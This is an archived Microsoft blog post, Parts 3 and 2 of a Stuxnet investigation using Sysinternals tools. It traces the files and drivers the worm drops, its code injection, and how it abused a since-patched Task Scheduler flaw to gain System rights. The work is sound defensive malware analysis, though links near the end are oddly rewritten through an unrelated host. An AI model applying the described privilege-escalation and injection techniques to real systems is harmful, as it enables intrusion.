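<P> On buffers like these, text-like content yields many strings and comparatively low entropy, while evenly distributed bytes score at the upper bound. A value near that bound is consistent with compression or encryption but does not prove either. 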
</P> <P> I thought that by looking at the way Stuxnet references the .PNF files, I might find additional clues regarding their purpose. To get a more complete view of their usage, I captured a Process Monitor boot log of the system rebooting after the infection. Boot logging, which you configure by selecting Enable Boot Logging in the Options menu, has Process Monitor capture activity from very early in the next boot and stop capturing either when you run Process Monitor again, or when the system shuts down: </P> <P> <IMG alt="image_thumb4" border="0" height="221" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5280.image_5F00_thumb4_5F00_thumb_5F00_6560C1AA.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121336i4F358CD3A8DD009A" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb4" width="201" /> </P> <P> After capturing a boot log that included me logging back into the system, I loaded the boot log into one Process Monitor window and the initial infection trace into a second Process Monitor window. Then I reset the filters in both traces, removed the advanced filter that excludes System process activity, and added an inclusion filter for Mdmeric3.pnf to see all activity directed at the first file. The infection trace had the events related to the initial creation of the file and nothing more, and the file wasn’t referenced at all in the boot log. It appeared that Stuxnet didn’t leverage the file during the initial infection or in its subsequent activation. The file’s small size, 90 bytes, implies that it is data, but I couldn’t determine its purpose based on the little evidence I saw in the logs. 
In fact, the file may serve no useful purpose since none of the published Stuxnet reports have anything further to say about the file other than that it’s a data file. </P> <P> Next, I repeated the same filtering exercise for Mdmcpq3.pnf. In the infection log, I had seen the Services.exe process write the file’s contents three times during the initial infection, but there were no accesses afterward. In the boot trace, I could see Services.exe read the file immediately after starting: </P> <P> <IMG alt="image_thumb11" border="0" height="54" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5706.image_5F00_thumb11_5F00_thumb_5F00_12E1E16E.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121337iE056FA90BD747B4B" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb11" width="554" /> </P> <P> The fact that Stuxnet writes the file during the infection and reads it once when it activates during a system boot, coupled with the file’s relatively small size, hints that it might be Stuxnet configuration data, and that’s what formal analysis by antivirus researchers has concluded. </P> <P> The third file, Oem7a.pnf, is the largest of the files. I saw during my analysis of the infection log in the last post that after the rogue Lsass.exe writes the file during the infection, one of the other rogue Lsass.exe instances reads it in its entirety, as does the infected Services.exe process. 
An examination of the boot log showed that Services.exe reads the entire file when it starts: </P> <P> <IMG alt="image" border="0" height="147" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8802.image_5F00_thumb_5F00_0A0CCF65.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121338iF1A7BEDA690C1E2B" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="468" /> </P> <P> What’s unusual is that the read operations are the very first performed by Services.exe, even before the Ntdll.dll system DLL loads. Ntdll.dll loads before any user-mode code executes, so seeing activity before then can only mean that kernel-mode code is responsible. The stack shows that they are actually initiated by Mrxcls.sys, one of the Stuxnet drivers, from kernel mode: </P> <P> <IMG alt="image_thumb3" border="0" height="246" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2465.image_5F00_thumb3_5F00_thumb_5F00_1275AE79.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121339i7EBCA384464D6816" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb3" width="254" /> </P> <P> The stack shows that Mrxcls.sys is invoked by the PsCallImageNotifyRoutines kernel function. That means Mrxcls.sys called <A href="#" target="_blank"> PsSetLoadImageNotifyRoutine </A> so that Windows would call it whenever an executable image, such as a DLL or device driver, is mapped into memory. 
Here, Windows was notifying the driver that the Services.exe image file was loading into memory to start the Services.exe process. Stuxnet clearly registers with the callback so that it can watch for the launch of Services.exe. Ironically, Process Monitor also uses this callback functionality to monitor image loads. </P> <P> These observations point at Mrxcls.sys as the driver that triggers the infection of user-mode processes when the system boots after the infection. Further, the size of the file, 498,176 bytes (487 KB), almost exactly matches the size of the virtual memory region, 488 KB, from where we saw Stuxnet operations initiate in Part 1 of the investigation. That region held an actual DLL, so it appears that Oem7a.pnf is the encrypted on-disk form of the main Stuxnet DLL, a hypothesis that’s confirmed by antimalware researchers. </P> <P> The final file, Oem6c.pnf, is not referenced at all in the boot trace. The only accesses in the infection trace are writes from the initial Lsass.exe process that also writes the other files. Thus, this file is written during the initial infection, but apparently never read. There are several potential explanations for this behavior. One is that the file might be read under specific circumstances that I haven’t reproduced in my test environment. Another is that it is a log file that records information about the infection for collection and review by Stuxnet developers at a later point. It’s not possible to tell from the traces, but antimalware researchers believe that it is a log file. </P> <H4> Windows 7 Elevation of Privilege </H4> <P> Many of the operations performed by Stuxnet, including the infection of system processes like Services.exe and the installation of device drivers, require administrative rights. 
If Stuxnet had failed to infect systems whose users lack those rights, its ability to spread would have been severely hampered, especially into the sensitive networks it seems to have been targeting, where most users likely run with standard user rights. To gain administrative rights from standard-user accounts, Stuxnet took advantage of two zero-day vulnerabilities. </P> <P> On Windows XP and Windows 2000, Stuxnet used an index-checking bug in Win32k.sys that could be triggered by loading specially crafted keyboard layout files (fixed in <A href="#" target="_blank"> MS10-073 </A> ). The bug allowed Stuxnet to inject code into kernel mode and run with kernel privileges. On Windows Vista and newer, Stuxnet used a flaw in the access protection of scheduled task files that enabled it to give itself administrative rights (fixed in <A href="#" target="_blank"> MS10-092 </A> ). Standard users can create scheduled tasks, but those tasks should only be able to run with the same privileges as the user who created them. Before the bug was fixed, Windows would create the file storing a task with permissions that allowed standard users to modify the file. Stuxnet took advantage of the hole by creating a new task, setting the flag in the resulting task file that specifies that the task should run in the System account, which has full administrative rights, and then launching the task. </P> <P> To watch Stuxnet exploit the Windows 7 bug, I started by uninstalling the related patch on a test system and monitored a Stuxnet infection with Process Monitor. After capturing the trace, I followed the same steps I described in the last post of setting a filter that discarded all operations except those that modify files and registry keys (“Category Is Write”), and then methodically excluding unrelated events. 
When I was finished, the Process Monitor window looked like this: </P> <P> <IMG alt="image" border="0" height="269" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7612.image_5F00_thumb_5F00_60724987.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121340i36D5062E10153E27" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The first events are Stuxnet dropping the temporary files that it later copies to PNF files in the C:\Windows\Inf directory. Those are followed by Svchost.exe events that are clearly related to the Task Scheduler service. The Svchost.exe process creates a new scheduled task file in C:\Windows\System32\Tasks and then sets some related registry values. Stack traces of the events show that Schedsvc.dll, the DLL that implements the Task Scheduler service, is responsible: </P> <P> <IMG alt="image" border="0" height="299" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5141.image_5F00_thumb_5F00_74F79905.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121341i5A3EA2B3335261A0" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> A few operations later, Explorer writes some data to the new task file: </P> <P> <IMG alt="image" border="0" height="92" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2425.image_5F00_thumb_5F00_18B0C0A0.png" 
src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121342i3FBA656E1824187C" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> This is the operation that shouldn’t be possible, since a standard user account should not be able to manipulate a system file. We saw in the last post that the &lt;unknown&gt; frames in the stack of the operation show that Stuxnet is at work: </P> <P> <IMG alt="image" border="0" height="321" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4174.image_5F00_thumb_5F00_385F9A68.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121343iFC9C0D8ABFD25C18" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="304" /> </P> <P> The final operations in the trace associated with the task file are those of the Task Scheduler deleting the file, so Stuxnet apparently modifies the task, launches it, and then deletes it: </P> <P> <IMG alt="image" border="0" height="57" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1263.image_5F00_thumb_5F00_6CFFF6A3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121344i3E70B9F602399F8B" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> To verify that the Task Scheduler in fact launches the task, I removed the write filter 
and applied another filter that included only references to the task file. That made an event appear in the display that shows Svchost.exe read the file after Stuxnet wrote to the file: </P> <P> <IMG alt="image" border="0" height="59" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8204.image_5F00_thumb_5F00_5EC17DB3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121345i1F214F974BBB6A47" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> As a final confirmation, I looked at the operation’s stack and saw the Task Scheduler service’s SchRpcEnableTask function, whose name implies that it’s related to task activation: </P> <P> <IMG alt="image" border="0" height="186" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1854.image_5F00_thumb_5F00_7E70577B.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121346i7756CD4C5808A8EC" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="327" /> </P> <H4> Stuxnet Revealed by the Sysinternals Tools </H4> <P> In this concluding segment of my Stuxnet investigation, I was able to use Process Monitor’s boot logging feature to gather clues pointing to the purpose of the various files Stuxnet drops on a system at the time of infection. Process Monitor also revealed the method by which Stuxnet used a flaw in the Task Scheduler service on Windows 7 to give itself administrative rights. 
</P> <P> This blog post series shows how the Sysinternals tools can provide an overview of malware infection and subsequent operation, as well as present a guide for cleaning an infection. They showed many of the key aspects of Stuxnet’s behavior with relative ease, including the launching of processes, dropping of files, installation of device drivers and elevation of privilege via the task scheduler. As I pointed out at the beginning of Part 1, a professional security researcher’s job would be far from done at this point, but the view given by the tools provides an accurate sketch of Stuxnet’s operation and a framework for further analysis. Static analysis alone would make gaining this level of comprehension virtually impossible, certainly within the half hour or so it took me using the Sysinternals tools. </P> <P> <EM> Mark Russinovich is a Technical Fellow on the Windows Azure team at Microsoft and is author of <A href="#" target="_blank"> Windows Internals </A> , <A href="#" target="_blank"> The Windows Sysinternals Administrator’s Reference </A> , and the cyberthriller <A href="#" target="_blank"> Zero Day: A Novel </A> . You can contact him at </EM> <A href="https://gorovian.000webhostapp.com/?exam=mailto:markruss@ntdev.microsoft.com" target="_blank"> <EM> markruss@ntdev.microsoft.com </EM> </A> <EM> . 
</EM> </P> </BODY></HTML> Thu, 27 Jun 2019 07:18:06 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/analyzing-a-stuxnet-infection-with-the-sysinternals-tools-part-3/ba-p/724073 MarkRussinovich 2019-06-27T07:18:06Z Analyzing a Stuxnet Infection with the Sysinternals Tools, Part 2 https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/analyzing-a-stuxnet-infection-with-the-sysinternals-tools-part-2/ba-p/724055 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 15, 2011 </STRONG> <BR /> <P> In <A href="#" target="_blank"> Part 1 </A> I began my investigation of an example infection of the infamous Stuxnet worm with the Sysinternals tools. I used <A href="#" target="_blank"> Process Explorer </A> , <A href="#" target="_blank"> Autoruns </A> and <A href="#" target="_blank"> VMMap </A> for a post-infection survey of the system. Autoruns quickly revealed the heart of Stuxnet, two device drivers named Mrxcls.sys and Mrxnet.sys, and it turned out that disabling those drivers and rebooting is all that’s necessary to disable Stuxnet (barring a reinfection). With Process Explorer and VMMap we saw that Stuxnet injected code into various system processes and created processes running system executables to serve as additional hosts for its payload. By the end of the post I had gotten as far as I could with a snapshot-based view of the infection, however. In this post I continue the investigation by analyzing the <A href="#" target="_blank"> Process Monitor </A> log I captured during the infection to gain deeper insight into Stuxnet’s impact on an infected system and how it operates (incidentally, if you like these blog posts, cybersecurity, and books by Tom Clancy and Michael Crichton, be sure to check out my new cyberthriller, <A href="#" target="_blank"> Zero Day </A> ). 
</P> <H3> Filtering to Find Relevant Events </H3> <P> Process Monitor captured around 30,000 events while monitoring the infection, far too many to inspect individually for clues. Most of the trace actually consists of background Windows activity and operations related to Explorer navigating to a new folder, none of which is directly related to the infection. Even with the default filters, which exclude advanced events (paging file, internal IRP functions, System process and NTFS metadata operations), the status bar indicates that Process Monitor is still showing over 10,000 events: </P> <P> <IMG alt="image" border="0" height="111" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3823.image_5F00_thumb_5F00_6B55AF88.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121313i5C2FF0007019EA62" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="244" /> </P> <P> The key to using Process Monitor effectively when you don’t know exactly what you’re looking for is to narrow the amount of data to something manageable. Filters are a powerful way to do that, and Process Monitor has a filter tailor-made for these kinds of scenarios: a filter that excludes all events except ones that modify files or registry keys. 
You can configure this filter, “Category is Write then Include,” using the Filter dialog: </P> <P> <IMG alt="SNAGHTML32d6f75" border="0" height="254" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2620.SNAGHTML32d6f75_5F00_thumb_5F00_73D6C62E.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121314i6EC74C89087DC512" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="SNAGHTML32d6f75" width="404" /> </P> <P> Events generated by the System process are typically not relevant in troubleshooting cases, but I know that Stuxnet has kernel-mode components, so to be thorough I had to include events executed in the context of the System process, which is the process in which some device drivers execute system threads. You can remove the default filters by checking the Enable Advanced Output option on the filter menu, but I didn’t want to remove the other default filters that omit pagefile and NTFS metadata operations, so I removed just the System exclusion filter (the second one in the above filter list). The event count was down to 600: </P> <P> <IMG alt="image" border="0" height="82" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3022.image_5F00_thumb_5F00_3021D3BD.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121315i047AAB232E253146" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="244" /> </P> <P> The next step was to exclude events I knew weren’t related to the infection. 
Recognizing irrelevant events takes experience because it requires familiarity with typical Windows activity. For example, the first few hundred events of the remaining operations consisted of Explorer referencing values under the HKCU\Software\Microsoft\Windows\ShellNoRoam\BagsMRU registry key: </P> <P> <IMG alt="image" border="0" height="132" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6562.image_5F00_thumb_5F00_3ADF2B12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121316iE27356126C3AF3A5" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="454" /> </P> <P> This key is where Explorer stores state for its windows, so I could exclude those events. I did so by using Process Monitor’s “quick filters” feature: I right-clicked on one of the registry paths to bring up the quick filter context menu, and selected the Exclude filter: </P> <P> <IMG alt="image" border="0" height="167" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6560.image_5F00_thumb_5F00_68604AD5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121317i22BFB21A9EDECBA8" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="404" /> </P> <P> Because I wanted to exclude any references to the key’s subkeys or values, I opened the Filter dialog, double-clicked the newly created filter to move it into the filter editor, and changed “is” to “begins with”: </P> <P> <IMG alt="image" border="0" height="104" 
original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8508.image_5F00_thumb_5F00_2E03456D.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121318i2A6BFAE19D7ADF5B" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="444" /> </P> <P> That reduced the event count to 450, which is a more reasonable number, but I saw still more events that I could exclude. The next set of events were the System process reading and writing registry hive files. Hive files store registry data, but it’s the registry operations themselves that are interesting, not the underlying reads and writes to the hive files. Excluding those reduced the event count to 350. I continued looking through the log, adding additional filters to exclude other extraneous events. After I was done filtering out all the background operations, the Filter dialog looked like this (some of the filters I added aren’t visible in the screenshot): </P> <P> <IMG alt="image" border="0" height="339" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3884.image_5F00_thumb_5F00_5A6EC2F4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121319i6F45BF6C3917FBC7" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="354" /> </P> <P> Now there were only 133 events and a quick glance through them confirmed that they were all probably related to Stuxnet. It was time to start deciphering them. 
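</P> <P> The filtering steps above can also be approximated outside of Process Monitor. The following is a minimal Python sketch, assuming the trace has been saved as CSV and that the export has "Process Name", "PID", "Operation" and "Path" columns (check the header row of your own export). The sample rows and the hive directory prefix are hypothetical stand-ins, not data from the actual trace: </P>
<PRE>
import csv
import io

# Hypothetical sample rows laid out like a Process Monitor CSV export.
# The column names are an assumption; verify them against a real export.
SAMPLE = """Process Name,PID,Operation,Path
Explorer.EXE,1480,RegSetValue,HKCU\\Software\\Microsoft\\Windows\\ShellNoRoam\\BagsMRU\\0
System,4,WriteFile,C:\\WINDOWS\\system32\\config\\software
lsass.exe,300,WriteFile,C:\\WINDOWS\\system32\\Drivers\\mrxcls.sys
"""

# Lowercase path prefixes to exclude, in the spirit of "Path begins with ... then Exclude".
EXCLUDE_PREFIXES = (
    "hkcu\\software\\microsoft\\windows\\shellnoroam\\bagsmru",
    "c:\\windows\\system32\\config\\",
)


def keep(row):
    """Return True when the row's path does not begin with an excluded prefix."""
    return not row["Path"].lower().startswith(EXCLUDE_PREFIXES)


def filter_events(csv_text):
    """Parse CSV text and return only the rows that survive the exclusions."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [row for row in reader if keep(row)]


remaining = filter_events(SAMPLE)
for row in remaining:
    print(row["Process Name"], row["PID"], row["Operation"], row["Path"])
</PRE>
<P> Matching on a lowercase prefix mirrors changing “is” to “begins with” in the filter editor, so a key’s subkeys and values are excluded along with the key itself.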
</P> <H4> Stuxnet System Modifications </H4> <P> The first event in the remaining list shows Stuxnet, operating in the context of Explorer, apparently overwriting the first 4K of one of its two initial temporary files. </P> <P> <IMG alt="image" border="0" height="94" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3652.image_5F00_thumb_5F00_6B5BB0DD.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121320i9FD93976EE7DFE33" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> To verify that the write was indeed initiated by Stuxnet and not Explorer.exe, I double-clicked on the operation to open the Event Properties dialog and switched to the Stack page. The stack frame directly above the NtWriteFile API shows “&lt;unknown&gt;” as the Module name, which is Process Monitor’s indication that the stack address doesn’t lie in any of the DLLs loaded into the process: </P> <P> <IMG alt="image" border="0" height="222" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0312.image_5F00_thumb_5F00_6AEF7DE8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121321i23830F623E3F8672" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="289" /> </P> <P> If you are looking at stacks with third-party code you may also see &lt;unknown&gt; entries when the code doesn’t use standard calling conventions, because that interferes with the algorithm used by the stack tracing API on which Process Monitor relies. 
However, when I looked at Explorer’s address space with VMMap, I found a data region that contains the unknown stack address 0x2FA24D5 and has both Write and Execute permissions, a telltale sign of virus-injected code: </P> <P> <IMG alt="image" border="0" height="58" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3542.image_5F00_thumb_5F00_51877AAE.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121322i4252D22199C1FB70" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="434" /> </P> <P> The operations following Explorer.exe’s are those of an Lsass.exe process creating four files - ~Dfa.tmp, ~Dfb.tmp, ~Dfc.tmp and ~Dfd.tmp - in the account’s temporary directory. Many components in Windows create temporary files, so I had to verify that these were related to Stuxnet and not to standard Windows activity. A strong hint that Stuxnet was behind them is the fact that the process ID (PID) of the Lsass.exe process, 300, doesn’t match the PID of the system’s actual Lsass.exe process, which I identified in Part 1. In fact, the PID doesn’t match any of the three Lsass.exe processes that were running after the infection, confirming that it’s another rogue Lsass.exe process launched by Stuxnet. </P> <P> To see how this Lsass.exe process relates to the others, I pressed Ctrl+T to open the Process Monitor process treeview dialog (it can also be opened from the Tools menu). The process tree reveals that three additional Lsass.exe processes executed during the infection, including the one with a PID of 300. 
Their greyed icons in the treeview indicate that they exited before the Process Monitor capture stopped: </P> <P> <IMG alt="image" border="0" height="174" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3630.image_5F00_thumb_5F00_511B47B9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121323i91E75FFB3B392C62" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="220" /> </P> <P> I now knew that this was a rogue Lsass.exe process, but I had to verify that these temporary files weren’t just created by routine Lsass.exe activity. Again, I looked at their stacks and saw the &lt;unknown&gt; module marker like I had seen in the Explorer.exe operation’s stack. </P> <P> The next batch of entries in the trace are where things really get interesting, because we see Lsass.exe drop one of the two Stuxnet drivers, MRxCls.sys, in C:\Windows\System32\Drivers and create its corresponding registry keys: </P> <P> <IMG alt="image" border="0" height="134" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8171.image_5F00_thumb_5F00_3EE9C0F1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121324iCD55086143525075" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> I double-clicked on the WriteFile operation to see its stack and observed that the call to the CopyFileEx API meant that Stuxnet copied the driver’s contents from another file: </P> <P> <IMG alt="image" border="0" height="269" 
original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5102.image_5F00_thumb_5F00_777D2B04.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121325i22BAC75FA68EA54C" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="219" /> </P> <P> To see the file that served as the source of the copy, I temporarily disabled the write category exclusion filter by unchecking it in the filter dialog: </P> <P> <IMG alt="image" border="0" height="101" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1738.image_5F00_thumb_5F00_0251C254.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121326i0F06D1418EAE0270" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="306" /> </P> <P> That revealed references to the ~DFD.tmp file that was created earlier, so I knew that file contained a copy of the driver: </P> <P> <IMG alt="image" border="0" height="80" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3146.image_5F00_thumb_5F00_100CC855.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121327iD07091E638905CDF" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> A few operations later the System process loads Mrxcls.sys, activating 
the driver: </P> <P> <IMG alt="image" border="0" height="71" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6811.image_5F00_thumb_5F00_1B346AA4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121328i77DD1F16CE4B3E54" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Next, Stuxnet prepares and loads its second driver, Mrxnet.sys. The trace shows Stuxnet writing the driver first to ~DFE.tmp, copying that file to the destination Mrxnet.sys file, and defining the Mrxnet.sys registry values: </P> <P> <IMG alt="image" border="0" height="155" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6445.image_5F00_thumb_5F00_687D8C24.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121329i57EB9DABD44EDAF6" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> A few operations later the System process loads the driver like it loaded Mrxcls.sys. 
